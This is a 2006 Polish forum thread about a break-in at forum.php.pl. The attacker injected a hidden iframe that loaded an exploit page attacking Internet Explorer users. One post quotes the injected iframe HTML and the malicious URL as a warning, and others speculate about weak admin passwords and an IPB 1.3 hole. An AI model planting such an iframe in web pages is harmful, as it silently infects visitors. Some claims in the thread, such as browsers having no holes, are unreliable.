Master Miko
6.05.2006, 19:30:29
Co się wczoraj stało! Wchodzę na forum... (przez IE) patrzę, nagle pojawia się monit skryptu... i jakiś dziwny kod. Zacina się... firewall wybucha świszczy i promieniuje głęboką czerwienią...
wypluwając:
Kod
IP: 85.249.19.122
PORT: TCP
[362] MS WMF Code Exec Attempt Detected (CVE-2005-4560)
Wlazłem FIrefoxem... nic się nie pojawiło poza... Nie można połączyć się z domeną "http://2-extreme.biz/traff.php?adv=53" (BROŃ BOŻE NIE WCHODZIĆ TAM)
Zaintrygował mnie mały kwadracik na górze forum... był to iframe o treści:
<iframe src="http://2-extreme.biz/traff.php?adv=53" width=1 height=1></iframe>
Umieszczony dokładnie nad doctype.
Jak on się tam dostał?! Jak to się stało?! Jakim sposbem :|
Mam farta.. (i firewalla), bo naszczęście miałem dobre zabezpieczenia.. ale tak to mój komp byłby teraz... zainfekowany... to było dosyć niebezpieczne :/
seaquest
6.05.2006, 19:50:31
Wiemy, już zlikwidowaliśmy i zabezpieczyliśmy.
Master Miko
6.05.2006, 19:52:20
Cieszę się bardzo, że ekipa forum php jest bardzo szybka. Praktycznie 15 minut po zgłoszeniu wszystko było ok! Brawo.
Ale jednak pojawił się problem... który był dość niebezpieczny. Stałem się taki mniej pewny przez to wydarzenie... imo dziwne to było :|
nospor
6.05.2006, 20:43:25
Doskonale Cię rozumiem Master Miko. Postaramy się niedługo udzielic więcej informacji na ten temat, jak już tylko zbadamy dokladnie logi i bedziemy mieli pewność co i jak. Póki co nie chcemy na wyrost nic mówić, by potem nie bylo, ze cos źle mowimy lub wprowadzamy specjalnie w błąd.
ps: dziękuje z tego miejsca Tobie i innym osobom, za szybką reakcję, po zobaczeniu nieprawidłowości
kosheen2k
6.05.2006, 22:50:58
dokładnie miałem to samo, ale niestety mój Kerio Personal Firewall nie dał sobie rady... zdążylem też zauwazyć ten intrygujący kwadracik i nagle zwiecha komputera i restart...
Zajec
7.05.2006, 10:12:02
Dzwię się, że po takich akcjach ludzie jeszcze wracają do IE :-) Używajcie sobie na stałe Opery/Firefoksa, które są po prostu
niepodatne na jakieś tam "wirusy" stronowe
Master Miko
7.05.2006, 12:16:24
Ten wirus został zaprojektowany specjalnie na internet explorer. Wchodziłem na strone zhackowaną przez Firefoxa pojawiało się strona niedostępna. Równie dobrze można było zrobić hacka na firefoxa lub operę....
a dlaczego tylko na IE? pewnie znacie odpowiedź...
Cytat(Master Miko @ 2006-05-07 12:16:24)
a dlaczego tylko na IE? pewnie znacie odpowiedź...
Bo kto nie jest z nami jest przeciwko nam.
Wszyscy, którzy używaja IE pożałują!
GrayHat
7.05.2006, 14:39:24
heh php.pl chcialo zarobic co?? takie serwisy placa do 10€ za 1000 zainfekowanych kompow
na webhelp jest dyskusja na ten temat
Ooby które ucierpiały z powodu naszych problemów serdecznie przepraszamy.
Jest to jednak tylko jeszcze jeden przykład tego, że każdy komputer powinien być zaopatrzony w program antywirusowy - choćby w darmowego Avasta...
Ja nie mam nic
Ba - mam nawet zablokowany dostep do BIOSu w kompie.
Ktos sie orientuje czym to gowno mozna usunac
Bo chcialbym chociaz czesc danych w miare mozliwosci.
Slump
7.05.2006, 15:15:35
NuLL moze i glupia propozycja a resetowales biosa??
Tak tylko pytam
Mam laptopa - nie wiem nawet jak to sie robi - bede musial pokombinowac. Bios to i tak pol biedy - moje dane - praca i wszystko
strife
7.05.2006, 15:32:46
Cytat(NuLL @ 2006-05-07 16:20:10)
Mam laptopa - nie wiem nawet jak to sie robi - bede musial pokombinowac. Bios to i tak pol biedy - moje dane - praca i wszystko
Współczuje Ci, ja jakiś miesiąc dwa też miałem awarię, jednak spowodowaną eksperymentami z linuxem, straciłem 40 GB muzyki, filmów, i co najważnejsze sporo cennych danych.
Szukałem trochę o trojanie jednak żadnych konkretnych informacji nie znalazłem, dziwi mnie to, że trojan ustawił Ci hasło na BIOS - jeszcze o takim przypadku nie słyszałem.
Teraz mogą Ci jedynie pomóc programy, które odzyskują sformatowane partycje, żadnego polecić nie mogę bo żaden mi nie działał tak jakbym chciał
Jak coś znajdę dam znać :]
Pozdrawiam
Thx za troske
Osobiscie myslalem ze format bedzie - bo zamienilem dyski laptopowe i instaluje sobie obecnie nowego
Myslalem aby sie poratowac linuxem
Ale...
Zadzwonilem do pewnej osoby czyli administratora microsoftu
i co mi powiedzial :
-> zainstal sobie uczelnianego 2k3 Server na NTFSie
-> podepnij dysk z laptopa na USB do kompa stacjonarnego
-> zabron programom z laptopowego dysku dostepu do pamieci i dysku z 2k3 Server
-> wywal ten folder, nastepny - tak chyba z 400 MB folderow systemowych windowsa oraz tych z 'Documents and Settings'
-> podepnij dysk
i sprawdz...
DZIALA
Co do trojanow BIOSowych - to mozliwe - podobnie jak z poziomu Windowsa jest mozliwa aktualizacja BIOSu
Cytat("mail przeprosinowy")
W związku z ostatnim włamaniem na php.pl i rozesłaniem e-maili z adresem do zainfekowanego pliku ekipa php.pl chce przeprosić za wszystkie problemy powstałe w ten sposób.
W wyniku ataku dodano też do kodu forum ramkę, która u użytkowników przeglądarki Internet Explorer spowodowała wejście na zainfekowaną stronę. Poza tym zamieniono też adresy w jednym z tematów na prowadzące do zainfekowanego pliku wykonalnego.
Musimy przyznać, że do włamania doszło ze względu na słabe hasło jednego z naszych administratorów. Dlatego też zachęcamy do zmiany hasła na mocne (co najmniej 8 znaków, duże i małe litery, cyfry, znaki specjalne). Hasła typu: dom, qwerty, login itp nie są bezpieczne.
Chcę podkreślić, że wszystkie hasła zostały wzmocnione, a na całą sieć, z której pochodził atak nałożony został ban. Zostały też wzmocnione zabezpieczenia serwera, a do skryptu forum dopisano modyfikację, która wymaga podania dodatkowego hasła w celu wysłania wiadomości do wszystkich użytkowników.
Jeszcze raz serdecznie przepraszamy.
...
wlasnie dostalem takiego maila z przeprosinami,
hmm jak najbardziej na miejscu - szczegolnie dla tych ktorzy sie nacieli,
ale czy naprawde panowie nie uwazacie ze do kwestii bezpieczenstwa powinno sie podejsc nieco inaczej niz ban na cala klase adresow z ktorych bylo/moglo byc polaczenie ?
[info] nie chce byc odebrany jako jakis natret, albo cus, ale mam wrazenie ze taka reakcja to raczej jeden sik z hydrantu w plonacy budynek... hmm, on dalej po chwili bedzie plonac [/info]
Radarek
7.05.2006, 17:23:15
A mnie osobiscie dziwi to 'słabe hasło jednego z naszych administratorów'. Nie wiem czy to jeden z uzytkownikow tego forum, ale jakies pojecie o haslach powiniem miec. Bez przesady...
aleksander
7.05.2006, 17:34:58
przyznac sie ktory to:D bedzie publiczne biczowanie:D
strife
7.05.2006, 17:39:44
Cytat(Radarek @ 2006-05-07 18:23:15)
A mnie osobiscie dziwi to 'słabe hasło jednego z naszych administratorów'. Nie wiem czy to jeden z uzytkownikow tego forum, ale jakies pojecie o haslach powiniem miec. Bez przesady...
A ja to zrozumiałem, że "słabe" w sensie, że nie wystarczyło bo jednak był włam. Każde zabezpieczenie wydające się nam najlepsze może się okazać za "słabe" jak ktoś je złamie. Tak to odebrałem:)
Przecież administrator to też człowiek ( chyba
).
GrayHat
7.05.2006, 18:49:04
bierzcie przyklad ze mnie
18 znakow: 6 cyfr, 6 liter malych i 6 liter wielkich
Zajec
7.05.2006, 18:51:03
Cytat(Master Miko @ 2006-05-07 12:16:24)
Równie dobrze można było zrobić hacka na firefoxa lub operę....
Wybacz, że zburzę Twój światopogląd... FIrefox nie ma żadnej krytycznej dziury, Opera w ogóle żadnej.
Co więcej, wszystkie dziury wykryte w tych przeglądarkach są bardzo szybko łatane i wypuszczane odpowiednie łatki. Firefox uaktualnia się automatycznie do najnowsze wersji, Opera wyświetla informacje o nowszej wersji i podaje linka, by ją ściągnąć.
[dodano]
http://security.blaut.biz/
seaquest
7.05.2006, 19:36:40
Fo: ban na całą klasę adresów, to jeszcze dodatkowe zabezpieczenie, ponieważ ataki nie pochodziły z Polski.
Poza tym zwiększyliśmy zabezpiecznia użytkowników uprzywilejowwanych i do kluczowych dla systemu funkcji dodaliśmy dodatkowe, niestandartowe zabezpieczenia.
Myślę, że zrobiliśmy wszystko, żeby taka sytuacja się nie powtórzyła.
GrayHat: 012345abcdefABCDEF - zgadlem ? :PPPP
Cytat(Seth @ 2006-05-07 19:58:41)
GrayHat: 012345abcdefABCDEF - zgadlem ? :PPPP
Kto jak kto, ale jak na GrayHat to wielce prawdopodobne...
Ewentualnie obstawiam ze to hash md5 i pierwsze 6 znakow z duzej litery.
Co do biosow, to sa uniwersalne hasla.
Moral z tego taki, nie uzywac dziurawych systemow operacyjnych
Np mi sie nic nie stalo
mario
7.05.2006, 20:30:52
przeczytalem przed chwileczka mail'a nt. wlamu. Wszyscy mieli dostac jakas "masowke" zapraszajaca na zhakowane forum. Cale szczescie do mnie taki mail nie doszedl, a po drugie uzywam Opery :-)
IE jest do d.... Opera i Firefox RULEZZZZZ!!!!!!!!!
spenalzo
7.05.2006, 20:47:17
Prosze o info jak ten syf usunąć z IPB - u mnie na forum pojawiło sie to samo. Dociekajac co to jest, spróbówałem odpalić tego linka przez IE - po czym zacząłem tego żąłować ._.
Tak czy siak, prosze o pomoc w usunieciu tego szajsu z IPB
angel2953
7.05.2006, 21:05:00
Cytat(spenalzo @ 2006-05-07 20:47:17)
Prosze o info jak ten syf usunąć z IPB - u mnie na forum pojawiło sie to samo. Dociekajac co to jest, spróbówałem odpalić tego linka przez IE - po czym zacząłem tego żąłować ._.
Tak czy siak, prosze o pomoc w usunieciu tego szajsu z IPB
skoro to już jest drugi tego typu atak (może jest ich więcej) to można by to zgłosić do autorów IPB, bo może to dziura w samym skryptcie...
Spenalzo - czy wiecie, w jaki sposob ktoś zdobył hasla administracyjne?
Czy też spodziewasz się jakiejść dziury lub backdora ?
czy też mówisz o czymś jeszcze innym (bo nie do końca rozumiem) ?
spenalzo
7.05.2006, 21:28:53
Mówie o dokładnie tym samym
Co ciekawe - zauważyłem to dzisiaj rano (+ info od userów o wirusach, ja nie miałem), usunąłem. Po paru godzinach ten iframe pojawił sie znowu
co mnie dosyć poważnie zaniepokoiło co do bezpieczeństwa forum...
W pierwszej chwili pomyśłałem, że ktoś złamał moje hasła np. do forum - jednak jak zobaczyłem ten temat tutaj to zaniepokoiłem sie troche bardziej, bo skoro przydarzyło sie to na dwóch forach mniej wiejcej w tym samym czasie to jest to coś bardziej poważnego niż złamane hasło :/
Master Miko
7.05.2006, 21:39:15
Cytat(Zajec @ 2006-05-07 17:51:03)
Cytat(Master Miko @ 2006-05-07 12:16:24)
Równie dobrze można było zrobić hacka na firefoxa lub operę....
Wybacz, że zburzę Twój światopogląd... FIrefox nie ma żadnej krytycznej dziury, Opera w ogóle żadnej.
Co więcej, wszystkie dziury wykryte w tych przeglądarkach są bardzo szybko łatane i wypuszczane odpowiednie łatki. Firefox uaktualnia się automatycznie do najnowsze wersji, Opera wyświetla informacje o nowszej wersji i podaje linka, by ją ściągnąć.
[dodano]
http://security.blaut.biz/ ahahahahahah koleś tym postem mnie ZABIŁEŚ
!!
////
a co do bezpieczeństwa ufam, że jeśli teraz super zabezpieczyliście swoje hasła to to się nie powtórzy
spenalzo - jesli używasz ipb 1.3 to problem może być w czymś zupełnie innym. Używany przez nas skrypt nie ma ograniczenia na ilośc prób logowania.
Oznacza to, że ... jest bardzo podatny na brutal force.
Planujemy w najbliższym czasie przygotowac modyfikację pod tym kątem. A narazie pozostaje nam tylko mieć nadzieję, że to nie jest coś poważniejszego...
Zajec
7.05.2006, 22:26:58
Cytat(Master Miko @ 2006-05-07 21:39:15)
ahahahahahah koleś tym postem mnie ZABIŁEŚ
!!
////
a co do bezpieczeństwa ufam, że jeśli teraz super zabezpieczyliście swoje hasła to to się nie powtórzy
Nie ma to jak konkretna, uargumentowana odpowiedź :-) Brawo, zbiłeś wszystkie moje argumenty.
spenalzo
7.05.2006, 23:12:45
No ja spodziewam sie akurat, że to nie jest złamane hasło... po pierwsze jest ono dość długie, zawiera cyfry itd. No i najważniejsze - dlaczego ktoś, kto złamał hasłó dodałby tylko coś takiego, anie np. nagrzebał coś wiecej na forum? BO jak dla mnie złamanie hasła tylko po to, zeby dodać iframe to jest nielogiczne troche...
A poza tym, brute force na stronie WWW powinno wygenerować zwiekszony ruch - a, że na mojej stronie jest on generalnie dość niski, to w ostatnich dniach nie widze żadnych podejrzanych odchyleń od normy...
Pewne ktos znalaz dziure na ipb i "sprzeda" oferte dodania "tego czegos" na kazdym ipb w wersji 1.3. Zapewne robi to poprostu automat puszczony w interncie (podobnie bylo z phpbb).
Trzeba zamienic wersje form na najnowsza jaka mamy i tyle... ba swoja droga suport 1.3 juz nie pomoze a jezeli ktos nie powie jak "to zrobil" (a watpie zeby to zrobil) to problem szybko nie zniknie.
angel2953
8.05.2006, 10:34:44
Cytat(spenalzo @ 2006-05-07 23:12:45)
No ja spodziewam sie akurat, że to nie jest złamane hasło... po pierwsze jest ono dość długie, zawiera cyfry itd. No i najważniejsze - dlaczego ktoś, kto złamał hasłó dodałby tylko coś takiego, anie np. nagrzebał coś wiecej na forum? BO jak dla mnie złamanie hasła tylko po to, zeby dodać iframe to jest nielogiczne troche...
A poza tym, brute force na stronie WWW powinno wygenerować zwiekszony ruch - a, że na mojej stronie jest on generalnie dość niski, to w ostatnich dniach nie widze żadnych podejrzanych odchyleń od normy...
Masz racę: to nie jest złamane hasło i nikogo z ekipy php.plnie należy winić. To jest dziura w IPB 1.3... Własnie znalazłem 23 (a to tylko pierwsza strona na googlach a jest ich klikadziesiąt) fora oparte o IPB 1.3, które mają lub miały ten sam problem...
MrMag
8.05.2006, 10:56:45
wiem, ze to samobojstwo, ale jezeli macie dostep do logow apacha mozna by poszukac jakis podejrzanych zapytan z tego okresu. u mnie czesto roboty nawalaja serie dziwnych zapytan do nieistniejacych katalogow na chybil trafil.
sztosz
8.05.2006, 11:31:07
Przepraszam że się wtrącę, ale to całe przpraszanie ekipy forum za to że ktoś ma zainfekowanego kompa jest trochę bez sensu. To tak jakby burmistrz miasta przepraszał kogoś, że temu komuś ktośsię do chałupy włamał. A to że gość nIE zamknął dzwi na klucz nie ma znaczenia.
Panowie piszecie aplikacje w php które powinny być bezpieczne, a sami nie potraficie wlasnych komputerów zabezpieczyć?
angel2953
8.05.2006, 13:39:15
Cytat(MrMag @ 2006-05-08 10:56:45)
wiem, ze to samobojstwo, ale jezeli macie dostep do logow apacha mozna by poszukac jakis podejrzanych zapytan z tego okresu. u mnie czesto roboty nawalaja serie dziwnych zapytan do nieistniejacych katalogow na chybil trafil.
Szczególnie bym obadał odwołania do login.php bo z tego co czytałem to tam
chyba jest ta dziura z uzyskaniem praw admina...
@normanos: z tego co się orientuję to ten bład jest do wersji 2.0.4 a podobny w wersji 2.1.5...
IPB 1.3 to prehistoria. sporo dziur. od tej wersji minelo pare lat az do 2.1.x
swoja droga czemu nie kupicie licencji?
Slump
8.05.2006, 14:27:58
Licecja jest od dawna, prace nad uruchomieniem forum podobnego do php vol 2 trwaja beware
angel2953
8.05.2006, 14:40:39
Cytat(Slump @ 2006-05-08 14:27:58)
Licecja jest od dawna, prace nad uruchomieniem forum podobnego do php vol 2 trwaja beware
Znaczy się bezie nowa wersja IPB czy zupełnie nowy skrypt forum (napisany przez ekipę php.pl
)
?
IPB 2.1
Co do własnego - wystarczy że wielu z nas angażuje się / angażowal w OPB
kwiateusz
8.05.2006, 18:22:03
no wreszcie bo 1.3 troche archaiczny system D: SLump znajdujesz czas na upgrade przy pracy nad OPB
seaquest
8.05.2006, 19:24:18
Ale to nie on, tylko ja, NuLL i jeszcze pare innych osób, które robiło mody. Oczywiście Slump też między innymi.
spenalzo
8.05.2006, 21:05:14
Dzisiaj poprzeglądałem troche statsy z webalizera - i co sie okazało?
W maju było ~200 odwołan do admin.php
- z czego moich jakieś 5
No i chyba mamy przyczyne.
kwiateusz
8.05.2006, 22:19:48
nie wiem czy do 1.3 jest taki modzik ale do 2.1 jest ze mozna admin.php przeniesc do dowolnego pliku... tak kwestia zabezpieczen
acztery
8.05.2006, 23:35:14
forum na którym tyle o bezpieczenstwie a tu włam, to Ci ironia.
GrayHat
9.05.2006, 00:20:36
Cytat(sztosz @ 2006-05-08 12:31:07)
Przepraszam że się wtrącę, ale to całe przpraszanie ekipy forum za to że ktoś ma zainfekowanego kompa jest trochę bez sensu. To tak jakby burmistrz miasta przepraszał kogoś, że temu komuś ktośsię do chałupy włamał. A to że gość nIE zamknął dzwi na klucz nie ma znaczenia.
Panowie piszecie aplikacje w php które powinny być bezpieczne, a sami nie potraficie wlasnych komputerów zabezpieczyć?
nie zgodze sie z toba. obowiazkiem ekipy php.pl jest zabezpieczanie serwerow. to nie pierwszy wlam do php.pl kiedys podmieniono nawet strone... to tak jak by ktos uzyskal dostep do wszystkich kont pocztowych na onecie dzieki dziurze w webmailu... i co to wina programisty ktory go pisal czy zarzadu??
GrayHat czemu nie czytasz wszytkich tematow i sie wypowiadasz?
sztosz
9.05.2006, 11:46:20
@GrayHat: Ale co to że kompy zostały zainfekowane to wina użytkowników w tym przypadku. Co innego jak ktoś przegląda moją pocztę na serwerze (to jest niedopuszczalne), a co innego jak ktoś ma np. zdalny dostęp do mojego komputer w domu, bo go nie zabezpieczyłem choćby darmowym antywirusem i firewallem.
To jest wersja lo-fi głównej zawartości. Aby zobaczyć pełną wersję z większą zawartością, obrazkami i formatowaniem proszę
kliknij tutaj.